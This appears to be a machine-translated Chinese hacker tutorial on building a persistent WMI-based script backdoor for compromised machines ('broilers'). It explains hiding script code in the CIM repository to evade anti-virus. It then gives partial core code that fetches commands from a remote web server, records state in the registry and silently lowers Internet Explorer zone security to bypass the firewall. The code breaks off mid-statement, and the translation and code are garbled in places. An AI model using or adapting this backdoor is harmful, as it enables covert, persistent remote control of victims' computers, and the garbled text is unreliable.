Regarding the various parts of the event handling mechanism, there is a detailed story in the "WMI Technical Guide", and it is of course more comprehensive in MSDN. I will not have it. (Look at it, drink your mouth, take a break ^ _ ^) Let's start discussing the scripting back door. WMI provides two timers: __ absolutetimerinstruction and __intervaltimerinstruction, generates events in the specified time and time interval, registering a filter to capture timer events, then bind ASEC, we have received a rare program from Starting method. Moreover, the script code is completely hidden in the CIM repository, does not exist in an independent file, and the killing is more difficult. This is the advantage of the back door of the script, but there are many difficulties: 1. Script running, Scrcons.exe with the system as a script host (Windows designer yet is not stupid to use WMI services as a script host). This will increase a process, although it is a normal process, anti-virus software is nothing, but it is too conspicuous. So, you can't let the script run in the background, but should start once every time, then end as soon as possible. After the script is over, the Scrcons.exe process will not end automatically, and the script must take the script to take the initiative to terminate the host process with Win32_Process objects provided by WMI (boiled beans 萁 萁 ?!). 2, the network function of the script is very poor, basically only relying on objects such as Microsoft.xmlhttp. Therefore, the script rear door cannot listen to the port and provide the CMD shell, which can only be connected to the web server to get the control command. A viable way is to put a command file on the web server, the script is backed up to find the server according to the domain name and download the command file, and respond according to the content. So, you need a web server, or build a temporary server with tools such as NetBox. Of course, you don't need to let the server always online, you need to control the script after running again. 3. Since the script rear door intermittent operation, it is necessary to prevent the same command from being run again. The solution is to record the length of the command in the registry, compare the length and record each time you get the command, if the same is skipped, the difference overrides and executes the command. 4. In order to penetrate the firewall with the IE object, the XMLHTTP object must be created in IE, which will be limited by the Internet domain security level. Even if the code is saved in the HTML file, use IE to open it, but it is just a "my computer" domain, create an unsafe ActiveX object or the warning dialog will pop up. The solution is to modify the registry and temporarily change the security settings. 5. WScript object is provided by WScript.exe or CScript.exe, while Scrcons.exe is not provided, so many common functions, such as WScript.sleep can't be used. You can't use XMLHTTP asynchronously without Sleep, and synchronous XMLHTTP may be blocked for a long time, which is much more disadvantage over the latter. Calling the ping command delaying a new process, with a "咚" tone with the POPUP method of WScript.Shell. Good in Microsoft.xmlhttp "relatives", such as MSXml2.xmlhttp, msxml2.serverxmlhttp, msxml2.domdocument, Winhttp.winhttpRequest, etc. The last one can set the timeout, just satisfied it. Even if there is more difficulties, the script is still worth challenged.
When the various types of Trojans on broiler have been cleared by the anti-virus software, the latte behind a 24-hour run may be your last hope.
Here is a simple script back door core code (no installation function): CODZ: cmdu = "http://myweb.8866.org/cmd.txt" 'URL' cmdw = 4000 'download timeout from the web server Time 4 second 'cmdl = "HKLM / Software / Microsoft / WBEM / CIMOM / CMDLENGTH"' Record the length of the key value name 'on error resume next' ignore the dead error '(Comment time) SEL = CREATEOBJECT ("Wscript.shell") 'Although the WScript root object cannot be used, its child object is still available' set aso = createObject ("AdoDb.Stream") Set IE = CreateObject ("InternetExplorer.Application") 'Use IE to bypass Firewall 'zone = "HKCU / Software / Microsoft / Windows / CurrentVersion / Internet Settings / Zones" set1 = zone & "01" set2 = zone & "00" set3 = zone & "/ currentlevel" VAL1 = shl.regread (set1)' Save the original Safety setting 'VAL2 = shl.regread (set2) VAL3 = shl.regread (set3) regd = "reg_dword" shl.RegWrite set1, 0, regd' allows unsea-safe ActiveX 'shl.Regwrite set2, 0 Regd 'allows the active script' shl.RegWrite set3, 0, regd 'Set the current Internet domain security level is "custom"' IE.visible = 0 ': ie.visible = 1' (debugging) IE.NAVIGATE ABOUT "&": blank "' Here, use string connection purely anti-forum filter 'IE.Document.write _
